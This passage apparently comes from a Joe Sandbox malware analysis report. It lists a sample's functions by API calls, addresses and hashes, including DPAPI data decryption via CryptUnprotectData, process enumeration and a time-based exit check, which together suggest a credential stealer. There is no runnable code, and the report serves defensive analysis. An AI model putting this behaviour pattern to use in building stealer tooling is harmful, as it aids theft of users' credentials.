                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$BinaryCryptStringlstrlen
                    • String ID:
                    • API String ID: 189259977-0
                    • Opcode ID: de62b09b6814789d2acf1a74ed3d7bf2dbbf10feeca26506ef58a6163db86390
                    • Instruction ID: b5efc5a308fca6e084428f243ad2750edd09b5e1798cfa5adfeb2dc3d389bca2
                    • Opcode Fuzzy Hash: de62b09b6814789d2acf1a74ed3d7bf2dbbf10feeca26506ef58a6163db86390
                    • Instruction Fuzzy Hash: BF41A2B5D0420ADFDB10CFA0DC89BFEB7B8BB48704F1045A9E509E6280D7749A84CF92
                    Function 003C6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                    Download Yara Rule
                    APIs
                    • GetSystemTime.KERNEL32(?), ref: 003C696C
                    • sscanf.NTDLL ref: 003C6999
                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003C69B2
                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003C69C0
                    • ExitProcess.KERNEL32 ref: 003C69DA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$System$File$ExitProcesssscanf
                    • String ID:
                    • API String ID: 2533653975-0
                    • Opcode ID: ac216c0b4e59a73d36cf6312bf1f61f05a167422172e41d5c128fb3d37db00fb
                    • Instruction ID: 3e3166f1be83cf63d12d0a943f16e6e5b5e4db1bbadbc4c54f34334badb515a0
                    • Opcode Fuzzy Hash: ac216c0b4e59a73d36cf6312bf1f61f05a167422172e41d5c128fb3d37db00fb
                    • Instruction Fuzzy Hash: 5321BAB5D14208ABCF05EFE4D945EEEB7B5BF58300F04852EE40AE3250EB745609DBA6
                    Function 003B7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 003B724D
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003B7254
                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 003B7281
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 003B72A4
                    • LocalFree.KERNEL32(?), ref: 003B72AE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                    • String ID:
                    • API String ID: 2609814428-0
                    • Opcode ID: b5a1342ac4747e14881cf220eeae5fc8223c4974fd82d33b277313065604771e
                    • Instruction ID: 7b0344d177731566c31b410a3b4cf4363b15ab9ef9c4f30f4222abd0fcd7c18a
                    • Opcode Fuzzy Hash: b5a1342ac4747e14881cf220eeae5fc8223c4974fd82d33b277313065604771e
                    • Instruction Fuzzy Hash: 620152B5A40208BBEB14DFE4CD49FAD7778EB44B04F104455FB09EB2C0C6B4AA04DB66
                    Function 003C9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                    Download Yara Rule
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003C961E
                    • Process32First.KERNEL32(003D0ACA,00000128), ref: 003C9632
                    • Process32Next.KERNEL32(003D0ACA,00000128), ref: 003C9647
                    • StrCmpCA.SHLWAPI(?,00000000), ref: 003C965C
                    • CloseHandle.KERNEL32(003D0ACA), ref: 003C967A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                    • String ID:
                    • API String ID: 420147892-0
                    • Opcode ID: d421f4625f9ebf5b5b412f00118d855793a9ba9e59c7bd52ce87995e3f680fd7
                    • Instruction ID: 2287f26e9c57474498a25ce06033287e39e502ad89ce26b2fb82101aa2c18adf
                    • Opcode Fuzzy Hash: d421f4625f9ebf5b5b412f00118d855793a9ba9e59c7bd52ce87995e3f680fd7
                    • Instruction Fuzzy Hash: 160129B5A00208ABCB11DFA5CC48FEDB7F8EB18350F004189A909D7280D774AE54DF52
                    Function 00783BD9 Relevance: 6.6, Strings: 4, Instructions: 1645COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: :vy$,Jw$wFk$|'_
                    • API String ID: 0-1627011548
                    • Opcode ID: 9da0da3c87029cc624f722566eafb916dce041416521e467a893faca6012c89c
                    • Instruction ID: 160c246a17c0dd4cb72066807b894e8d825d9c4b2280e885602c3323206bf18a
                    • Opcode Fuzzy Hash: 9da0da3c87029cc624f722566eafb916dce041416521e467a893faca6012c89c
                    • Instruction Fuzzy Hash: 49B217F3A0C2149FE3046E2DEC8567AFBE9EF94320F1A493DEAC4C3744E67558058696
                    Function 007805C7 Relevance: 6.6, Strings: 4, Instructions: 1643COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: &N3$nz>$}N*$^{Q
                    • API String ID: 0-681066692
                    • Opcode ID: b73a3fb96db0633f99931f63c0ee10204e51ec2250fe7964b7d29ada00d1ebd2
                    • Instruction ID: 846c81a2d8baa8077b14bfdf8744df2ac0ee62e35e95b5f89fae5e37084d100d
                    • Opcode Fuzzy Hash: b73a3fb96db0633f99931f63c0ee10204e51ec2250fe7964b7d29ada00d1ebd2
                    • Instruction Fuzzy Hash: 44B228F3A0C2049FE7046E2DEC8567AFBE9EF94620F1A493DEAC4C7744E97558018683
                    Function 003C8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                    Download Yara Rule
                    APIs
                    • CryptBinaryToStringA.CRYPT32(00000000,003B5184,40000001,00000000,00000000,?,003B5184), ref: 003C8EC0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: BinaryCryptString
                    • String ID:
                    • API String ID: 80407269-0
                    • Opcode ID: 5df83ece443cdcf1ba8012e2d24e82cac3a8121cc01b4af6f2a0b78490204729
                    • Instruction ID: 45874cb25dfa6948ca599de24d5eb8488e7d7696a26d1e11297adf3d7869b699
                    • Opcode Fuzzy Hash: 5df83ece443cdcf1ba8012e2d24e82cac3a8121cc01b4af6f2a0b78490204729
                    • Instruction Fuzzy Hash: 9D11F2B0200208AFDB01CF64E884FAA37A9AF89354F10945CF919CB250DB75EE41EB61
                    Function 003C7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0118F370,00000000,?,003D0E10,00000000,?,00000000,00000000), ref: 003C7A63
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003C7A6A
                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0118F370,00000000,?,003D0E10,00000000,?,00000000,00000000,?), ref: 003C7A7D
                    • wsprintfA.USER32 ref: 003C7AB7
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                    • String ID:
                    • API String ID: 3317088062-0
                    • Opcode ID: 01f959b6c8faf8de0bf67fbf4225dc58baf8eb8aded2842216fe98908545cae4
                    • Instruction ID: 26909fb9923104ca2eae302bf0679f1fb2c6c100bfc5999f162ecff1e5d280c1
                    • Opcode Fuzzy Hash: 01f959b6c8faf8de0bf67fbf4225dc58baf8eb8aded2842216fe98908545cae4
                    • Instruction Fuzzy Hash: DB115EB1D45218EBEB209B54DC49FA9B778FB04761F10439AE91AD32C0D7785E44CF52
                    Function 00779C47 Relevance: 5.2, Strings: 3, Instructions: 1422COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: K~v$O!p}$n.~_
                    • API String ID: 0-3894994114
                    • Opcode ID: f0c09d64e855683e84658af23b498f249b664dc64df5b1d9d8fe76d05bdd5d57
                    • Instruction ID: 06902b9079e14b131a6edceae04e718bbab1aa6f74d21c001265d5e6abe65898
                    • Opcode Fuzzy Hash: f0c09d64e855683e84658af23b498f249b664dc64df5b1d9d8fe76d05bdd5d57
                    • Instruction Fuzzy Hash: 7CA2E8F3A08204AFE3046E2DEC8576AF7E9EF94320F16853DE6C4C3744EA7598458697
                    Function 00789446 Relevance: 4.6, Strings: 3, Instructions: 861COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: %we}$F1z<$qyl
                    • API String ID: 0-2673106884
                    • Opcode ID: b16eb786b1aaefd85157349fc4ddd894da35bd4b0d7486372474ce153884e22c
                    • Instruction ID: dcb04b6e70e0229024fdf22e8c7c7b0915585d4fe44cf63907eef5d049e563e6
                    • Opcode Fuzzy Hash: b16eb786b1aaefd85157349fc4ddd894da35bd4b0d7486372474ce153884e22c
                    • Instruction Fuzzy Hash: 95423AF36082009FE704AE2DEC8567ABBEAEBD4320F2A453DE6C5C7744E93599018653
                    Function 003C3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                    Download Yara Rule
                    APIs
                    • CoCreateInstance.COMBASE(003CE118,00000000,00000001,003CE108,00000000), ref: 003C3758
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 003C37B0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharCreateInstanceMultiWide
                    • String ID:
                    • API String ID: 123533781-0
                    • Opcode ID: 3da090dcc2a5c4891ee76d4571ba96fafe6db74090e05c86fdfc43367d9b56cc
                    • Instruction ID: ab1bf2922a741208f6d4d9f76612c8c670de9a1100800aebc8b02b5e5642e6a0
                    • Opcode Fuzzy Hash: 3da090dcc2a5c4891ee76d4571ba96fafe6db74090e05c86fdfc43367d9b56cc
                    • Instruction Fuzzy Hash: 6341E870A40A289FDB24DB58CC95F9BB7B5BB48702F4081D8E609EB2D0D7716E85CF50
                    Function 003B9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                    Download Yara Rule
                    APIs
                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003B9B84
                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 003B9BA3
                    • LocalFree.KERNEL32(?), ref: 003B9BD3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Local$AllocCryptDataFreeUnprotect
                    • String ID:
                    • API String ID: 2068576380-0
                    • Opcode ID: 9890c5605488872011d8f464fc4170af2b927c138545bbfe509f0b7ed60da91f
                    • Instruction ID: 1b5e619cc62b7b3e995bef3fd926d4992ec4087e27e910fd284a76b7bc41690a
                    • Opcode Fuzzy Hash: 9890c5605488872011d8f464fc4170af2b927c138545bbfe509f0b7ed60da91f
                    • Instruction Fuzzy Hash: 0811F7B8A00209EFCB04DF94D985AAE77B5FF88300F104599E915A7350D774AE14CFA2
                    Function 0077EACC Relevance: 4.1, Strings: 2, Instructions: 1625COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
